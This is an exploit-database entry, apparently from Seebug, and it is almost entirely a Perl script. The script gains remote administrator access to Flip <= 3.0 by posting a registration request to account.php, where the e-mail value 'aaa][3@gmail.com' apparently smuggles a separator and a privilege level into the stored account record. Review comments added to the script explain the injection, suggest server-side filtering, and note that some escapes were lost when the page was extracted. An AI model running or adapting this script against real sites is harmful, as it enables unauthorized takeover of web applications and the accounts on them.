Flip <= 3.0 Remote Admin Creation Exploit

2007-09-20T00:00:00
ID SSV:7292
Type seebug
Reporter Root
Modified 2007-09-20T00:00:00

Description

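No description provided by source. Going by the listing below, the script sends a single registration request to Flip's account.php with a crafted e-mail field and reports success when the response contains "Successfully registered!".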

                                        
                                            
#!/usr/bin/perl

use strict; 
use IO::Socket;
use Getopt::Std;

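# Banner metadata printed at start-up; $vendor is informational only.
my $app = "Flip <= 3.0";
my $type = "Admin Creation";
my $author = "undefined1_";
my $vendor = "http://sourceforge.net/projects/flipsource";

# -t <url> is the only option; usage() exits when it is missing.
my %opt;
getopts("t:", \%opt);
$| = 1;	# unbuffered STDOUT so the prompts below show before STDIN is read
print ":: $app $type - by $author - www.undef1.com ::\n\n\n";

my $url = $opt{t} || usage();

# Normalise the target to "host[:port]/path/": drop a leading "http://"
# and make sure the string ends in a slash. The listing had lost the
# backslash escapes in both patterns, which left them unparseable; m{...}
# delimiters avoid the need to escape "/" at all.
if ($url =~ m{^(?:http://)(.*)}) {
	$url = $1;
}
if ($url !~ m{^.*/$}) {
	$url .= "/";
}

# Credentials for the account to be registered are read interactively.
print "username you want: ";
my $user = <STDIN>;
print "password you want: ";
my $pass = <STDIN>;
chomp($user);
chomp($pass);

create_admin($url, $user, $pass);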

# create_admin($url, $user, $pass)
# Builds a raw HTTP/1.1 POST for "<url>account.php?op=register" by hand and
# sends it through sendpacket(). The form body carries un (username), em
# (e-mail) and pw1/pw2 (the password twice). Prints "OK" when the response
# contains "Successfully registered!" and "failed" otherwise; the return
# value is not meaningful.
#
# NOTE(review): the line breaks inside the string literals below are literal
# newlines in this listing - presumably "\r\n"/"\n" escapes that were lost
# when the page was extracted; confirm against the original advisory.
sub create_admin {
	my $url = shift;
	my $user = shift;
	my $pass = shift;
	
	print "creating admin ... 	";
	# The em value is fixed and carries the sequence "][3" in front of the "@".
	# NOTE(review): presumably Flip stores account records with "][" as a field
	# separator, so an unfiltered e-mail value would add a field to the stored
	# record (the 3 looks like a privilege level) - confirm against the Flip
	# source. For defenders: the register handler must reject or encode
	# separator characters in every field, and logged POSTs to
	# account.php?op=register whose em value contains "][" deserve review.
	# NOTE(review): "@gmail" inside a double-quoted string is parsed by Perl as
	# an array; the listing has probably lost a backslash before the "@".
	# $user and $pass are interpolated as typed, without URL-encoding.
	my $content  = "un=$user&em=aaa][3@gmail.com&pw1=$pass&pw2=$pass";
	# Request line and headers; the Host header carries the host name only.
	my $data = "POST " . parse_page($url . "account.php?op=register") . " HTTP/1.1
";
	$data .= "Host: " . parse_host($url) . "
";
	# "Connection: close" lets sendpacket() read until the server hangs up.
	$data .= "Connection: close
";
	$data .= "Content-Type: application/x-www-form-urlencoded
";
	$data .= "Content-Length: " . length($content) . "

";
	my $recv = sendpacket(parse_host($url), parse_port($url), $data.$content);

	# Success is judged only by this marker string appearing in the response.
	if($recv !~ m/Successfully registered!/m) {
		print "failed
";
		return;
	}	
	print "OK
";		
}



# ======================================================

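# parse_host($url)
# Returns the host part of a scheme-less "host[:port]/path" string, i.e. the
# leading run of characters up to the first "/" or ":". The string must
# contain at least one "/"; otherwise the fallback "127.0.0.1" is returned.
sub parse_host {
	my $url = shift;
	# The listing had lost the backslash escapes for "/" in this pattern,
	# which left it unparseable; m{...} delimiters need no escaping.
	if ($url =~ m{^([^/:]+).*/}) {
		return $1;
	}
	return "127.0.0.1";
}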

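# parse_port($url)
# Returns the numeric port from a scheme-less "host:port/path" string, or
# "80" when no ":<digits>/" follows the host.
sub parse_port {
	my $url = shift;
	# The listing had lost the backslashes here: "d+" stood where "\d+" was
	# meant and the "/" characters were unescaped. Restored with m{...}.
	if ($url =~ m{^(?:[^/:]+):(\d+)/}) {
		return $1;
	}
	return "80";
}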

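# parse_page($url)
# Returns the path-and-query part of a scheme-less "host[:port]/path" string:
# everything from the first "/" onwards. Returns "/" when there is no "/"
# after a non-empty host part.
sub parse_page {
	my $url = shift;
	# The listing had lost the backslash escapes for "/" in this pattern,
	# which left it unparseable; m{...} delimiters need no escaping.
	if ($url =~ m{^(?:[^/]+)(/.*)}) {
		return $1;
	}
	return "/";
}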


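# sendpacket($server, $port, $data)
# Opens a TCP connection to $server:$port, writes $data verbatim and reads
# the reply line by line until the peer closes the connection (there is no
# timeout, so the caller is expected to send "Connection: close").
# Returns the whole reply as one string; dies if the connection fails.
sub sendpacket {
	my ($server, $port, $data) = @_;

	# Report the port that was actually used; the original message always
	# printed ":80" regardless of $port.
	my $sock = IO::Socket::INET->new(
		Proto    => "tcp",
		PeerAddr => $server,
		PeerPort => $port,
	) or die ":: Could not connect to $server:$port $!\n";
	print $sock $data;

	my $reply = "";
	while (defined(my $line = <$sock>)) {
		$reply .= $line;
	}

	close($sock);
	return $reply;
}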

# usage()
# Prints the one-line invocation help (script name plus the -t option) to
# STDOUT and ends the program.
sub usage() {
	my $script = $0;
	printf("usage: %s -t<url>\n", $script);
	exit;
}
